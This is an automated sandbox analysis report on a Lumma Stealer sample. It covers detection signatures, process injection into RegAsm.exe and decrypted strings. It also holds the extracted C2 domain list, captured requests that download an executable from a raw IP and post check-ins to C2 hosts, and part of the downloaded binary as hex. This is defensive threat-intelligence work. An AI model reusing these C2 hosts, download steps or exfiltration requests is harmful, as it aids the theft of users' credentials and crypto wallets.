Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe

Overview

General Information

Sample name:SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe
Analysis ID:1500506
MD5:876c12019e3b15fe92841e8d358d4921
SHA1:08e3fb4496270b4ab04d5adee71fefdb670114a1
SHA256:b8738d4888209ef2912d232eafbd13a0017bb62761a9f5d567c3fa0090a09972
Tags:exe
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
.NET source code references suspicious native API functions
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for sample
Sample uses string decryption to hide its real strings
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to read the clipboard data
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe (PID: 6612 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe" MD5: 876C12019E3B15FE92841E8D358D4921)
    • RegAsm.exe (PID: 4184 cmdline: "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
    • RegAsm.exe (PID: 320 cmdline: "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["condedqpwqm.shop", "stagedchheiqwo.shop", "stamppreewntnq.shop", "traineiwnqo.shop", "evoliutwoqm.shop", "locatedblsoqp.shop", "miracledzmnqwui.shop", "caffegclasiqwp.shop", "millyscroqwp.shop"], "Build id": "WpM2Co--SUSELL"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

    Sigma Signatures

    No Sigma rule has matched

    Suricata Signatures

    Timestamp:2024-08-28T15:29:04.443508+0200
    SID:2055378
    Severity:1
    Source Port:49703
    Destination Port:443
    Protocol:TCP
    Classtype:Domain Observed Used for C2 Detected
    Timestamp:2024-08-28T15:29:06.451728+0200
    SID:2055483
    Severity:1
    Source Port:50347
    Destination Port:53
    Protocol:UDP
    Classtype:A Network Trojan was detected
    Timestamp:2024-08-28T15:29:03.784058+0200
    SID:2055377
    Severity:1
    Source Port:57267
    Destination Port:53
    Protocol:UDP
    Classtype:Domain Observed Used for C2 Detected
    Timestamp:2024-08-28T15:29:05.247507+0200
    SID:2049836
    Severity:1
    Source Port:49703
    Destination Port:443
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:2024-08-28T15:29:05.247507+0200
    SID:2054653
    Severity:1
    Source Port:49703
    Destination Port:443
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:2024-08-28T15:29:05.751380+0200
    SID:2055489
    Severity:1
    Source Port:49704
    Destination Port:443
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:2024-08-28T15:29:06.199789+0200
    SID:2049836
    Severity:1
    Source Port:49704
    Destination Port:443
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:2024-08-28T15:29:06.199789+0200
    SID:2054653
    Severity:1
    Source Port:49704
    Destination Port:443
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:2024-08-28T15:29:07.638515+0200
    SID:2055493
    Severity:1
    Source Port:49707
    Destination Port:443
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:2024-08-28T15:29:07.105801+0200
    SID:2049836
    Severity:1
    Source Port:49705
    Destination Port:443
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:2024-08-28T15:29:07.105801+0200
    SID:2054653
    Severity:1
    Source Port:49705
    Destination Port:443
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:2024-08-28T15:29:05.253081+0200
    SID:2055479
    Severity:1
    Source Port:64418
    Destination Port:53
    Protocol:UDP
    Classtype:A Network Trojan was detected
    Timestamp:2024-08-28T15:29:06.967216+0200
    SID:2055493
    Severity:1
    Source Port:49705
    Destination Port:443
    Protocol:TCP
    Classtype:A Network Trojan was detected

    Joe Sandbox Signatures

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Antivirus detection for URL or domain
    Source: miracledzmnqwui.shopAvira URL Cloud: Label: phishing
    Source: stamppreewntnq.shopAvira URL Cloud: Label: phishing
    Source: https://traineiwnqo.shop/.%Avira URL Cloud: Label: malware
    Source: condedqpwqm.shopAvira URL Cloud: Label: phishing
    Source: https://traineiwnqo.shop/apimAvira URL Cloud: Label: malware
    Source: https://locatedblsoqp.shop/apiAvira URL Cloud: Label: malware
    Source: https://traineiwnqo.shop/apiAvira URL Cloud: Label: malware
    Source: https://traineiwnqo.shop/&%Avira URL Cloud: Label: malware
    Source: locatedblsoqp.shopAvira URL Cloud: Label: phishing
    Source: millyscroqwp.shopAvira URL Cloud: Label: malware
    Source: https://miracledzmnqwui.shop/apiAvira URL Cloud: Label: malware
    Source: caffegclasiqwp.shopAvira URL Cloud: Label: malware
    Source: https://traineiwnqo.shop/Avira URL Cloud: Label: malware
    Source: stagedchheiqwo.shopAvira URL Cloud: Label: phishing
    Source: traineiwnqo.shopAvira URL Cloud: Label: malware
    Found malware configuration
    Source: 3.2.RegAsm.exe.400000.0.raw.unpackMalware Configuration Extractor: LummaC {"C2 url": ["condedqpwqm.shop", "stagedchheiqwo.shop", "stamppreewntnq.shop", "traineiwnqo.shop", "evoliutwoqm.shop", "locatedblsoqp.shop", "miracledzmnqwui.shop", "caffegclasiqwp.shop", "millyscroqwp.shop"], "Build id": "WpM2Co--SUSELL"}
    AI detected suspicious sample
    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
    Machine Learning detection for sample
    Source: SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exeJoe Sandbox ML: detected
    Sample uses string decryption to hide its real strings
    Source: 3.2.RegAsm.exe.400000.0.raw.unpackString decryptor: caffegclasiqwp.shop
    Source: 3.2.RegAsm.exe.400000.0.raw.unpackString decryptor: stamppreewntnq.shop
    Source: 3.2.RegAsm.exe.400000.0.raw.unpackString decryptor: stagedchheiqwo.shop
    Source: 3.2.RegAsm.exe.400000.0.raw.unpackString decryptor: millyscroqwp.shop
    Source: 3.2.RegAsm.exe.400000.0.raw.unpackString decryptor: evoliutwoqm.shop
    Source: 3.2.RegAsm.exe.400000.0.raw.unpackString decryptor: condedqpwqm.shop
    Source: 3.2.RegAsm.exe.400000.0.raw.unpackString decryptor: traineiwnqo.shop
    Source: 3.2.RegAsm.exe.400000.0.raw.unpackString decryptor: locatedblsoqp.shop
    Source: 3.2.RegAsm.exe.400000.0.raw.unpackString decryptor: miracledzmnqwui.shop
    Source: 3.2.RegAsm.exe.400000.0.raw.unpackString decryptor: lid=%s&j=%s&ver=4.0
    Source: 3.2.RegAsm.exe.400000.0.raw.unpackString decryptor: TeslaBrowser/5.5
    Source: 3.2.RegAsm.exe.400000.0.raw.unpackString decryptor: - Screen Resoluton:
    Source: 3.2.RegAsm.exe.400000.0.raw.unpackString decryptor: - Physical Installed Memory:
    Source: 3.2.RegAsm.exe.400000.0.raw.unpackString decryptor: Workgroup: -
    Source: 3.2.RegAsm.exe.400000.0.raw.unpackString decryptor: WpM2Co--SUSELL
    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49703 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49704 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49705 version: TLS 1.2
    Source: SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
    Source: Binary string: C:\Users\Administrator\Desktop\RunPE-x\ConsoleApp66\obj\Release\ConsoleApp66.pdb source: SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [esi], ax3_2_0043406B
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [ebp-14h]3_2_0043406B
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp]3_2_0040B000
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp]3_2_004100CB
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [eax+02h], 00000000h3_2_00432080
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp]3_2_00414160
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [ecx], al3_2_00414160
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then push 00000000h3_2_00414160
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]3_2_00420120
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [ebx+esi*8], 625B6034h3_2_0041C1E0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx eax, word ptr [esi+ecx]3_2_004309A0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]3_2_00436250
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp edx3_2_00419A55
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, dword ptr [esp]3_2_00419A55
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [eax], cx3_2_0041FA7F
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp]3_2_0041C219
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx ebx, byte ptr [edx]3_2_00429A30
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, dword ptr [esp+04h]3_2_0040A2A0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov edx, dword ptr [ebp-10h]3_2_0041EB5F
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov dword ptr [esi+04h], ecx3_2_00423300
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [ebx], al3_2_00423300
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [eax], cl3_2_00423300
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov dword ptr [esp], 00000000h3_2_00412BC0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [edi], al3_2_00423BC9
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, ebp3_2_00406B80
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, ebp3_2_00406B80
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esi]3_2_004123AD
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [ecx], al3_2_00423C24
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+18h]3_2_00413555
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp byte ptr [edi], 00000000h3_2_0040EDDF
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h3_2_00418580
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [ecx], al3_2_00424D86
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, dword ptr [esp+08h]3_2_0041E594
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [ebx], cx3_2_00412D9D
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then lea eax, dword ptr [esp+20h]3_2_0041CE70
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx eax, word ptr [ebx]3_2_00436E10
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [edi], dl3_2_00423E16
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h3_2_004366B0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [ebp-10h]3_2_0041AEBD
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp byte ptr [esi+ebx], 00000000h3_2_00420710
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [esi], cx3_2_0041A7D8
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [ebp-10h]3_2_0041A7D8
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp byte ptr [esi], 00000000h3_2_0040EFE0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+48h]3_2_0040EFE0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [eax], cx3_2_004187E0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp]3_2_00418F9A
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp byte ptr [edi], 00000000h3_2_00418F9A
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp edx3_2_00418F9A
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, dword ptr [esp]3_2_00418F9A

    Networking

    barindex
    Suricata IDS alerts for network traffic
    Source: Network trafficSuricata IDS: 2055483 - Severity 1 - ET MALWARE Lumma Stealer Domain in DNS Lookup (traineiwnqo .shop) : 192.168.2.7:50347 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2055377 - Severity 1 - ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (miracledzmnqwui .shop) : 192.168.2.7:57267 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2055479 - Severity 1 - ET MALWARE Lumma Stealer Domain in DNS Lookup (locatedblsoqp .shop) : 192.168.2.7:64418 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2055493 - Severity 1 - ET MALWARE Lumma Stealer Domain in TLS SNI (traineiwnqo .shop) : 192.168.2.7:49707 -> 188.114.97.3:443
    Source: Network trafficSuricata IDS: 2055489 - Severity 1 - ET MALWARE Lumma Stealer Domain in TLS SNI (locatedblsoqp .shop) : 192.168.2.7:49704 -> 188.114.97.3:443
    Source: Network trafficSuricata IDS: 2055378 - Severity 1 - ET MALWARE Observed Lumma Stealer Related Domain (miracledzmnqwui .shop in TLS SNI) : 192.168.2.7:49703 -> 188.114.96.3:443
    Source: Network trafficSuricata IDS: 2055493 - Severity 1 - ET MALWARE Lumma Stealer Domain in TLS SNI (traineiwnqo .shop) : 192.168.2.7:49705 -> 188.114.97.3:443
    Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:49704 -> 188.114.97.3:443
    Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:49705 -> 188.114.97.3:443
    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49705 -> 188.114.97.3:443
    Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:49703 -> 188.114.96.3:443
    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49704 -> 188.114.97.3:443
    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49703 -> 188.114.96.3:443
    C2 URLs / IPs found in malware configuration
    Source: Malware configuration extractorURLs: condedqpwqm.shop
    Source: Malware configuration extractorURLs: stagedchheiqwo.shop
    Source: Malware configuration extractorURLs: stamppreewntnq.shop
    Source: Malware configuration extractorURLs: traineiwnqo.shop
    Source: Malware configuration extractorURLs: evoliutwoqm.shop
    Source: Malware configuration extractorURLs: locatedblsoqp.shop
    Source: Malware configuration extractorURLs: miracledzmnqwui.shop
    Source: Malware configuration extractorURLs: caffegclasiqwp.shop
    Source: Malware configuration extractorURLs: millyscroqwp.shop
    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 28 Aug 2024 13:29:02 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Tue, 27 Aug 2024 16:37:44 GMTETag: "43000-620acdc619d20"Accept-Ranges: bytesContent-Length: 274432Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 04 00 b3 ec cc 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 66 03 00 00 c6 00 00 00 00 00 00 30 99 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 f0 04 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 29 a4 03 00 78 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 04 00 40 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4c a5 03 00 a8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 9c 64 03 00 00 10 00 00 00 66 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 55 28 00 00 00 80 03 00 00 2a 00 00 00 6a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 5c ed 00 00 00 b0 03 00 00 58 00 00 00 94 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 40 42 00 00 00 a0 04 00 00 44 00 00 00 ec 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    Source: global trafficHTTP traffic detected: GET /files/u888.exe HTTP/1.1Host: 147.45.44.131Connection: Keep-Alive
    Source: Joe Sandbox ViewIP Address: 147.45.44.131 147.45.44.131
    Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
    Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
    Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: miracledzmnqwui.shop
    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: locatedblsoqp.shop
    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: traineiwnqo.shop
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
    Source: global trafficHTTP traffic detected: GET /files/u888.exe HTTP/1.1Host: 147.45.44.131Connection: Keep-Alive
    Source: global trafficDNS traffic detected: DNS query: miracledzmnqwui.shop
    Source: global trafficDNS traffic detected: DNS query: locatedblsoqp.shop
    Source: global trafficDNS traffic detected: DNS query: traineiwnqo.shop
    Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: miracledzmnqwui.shop
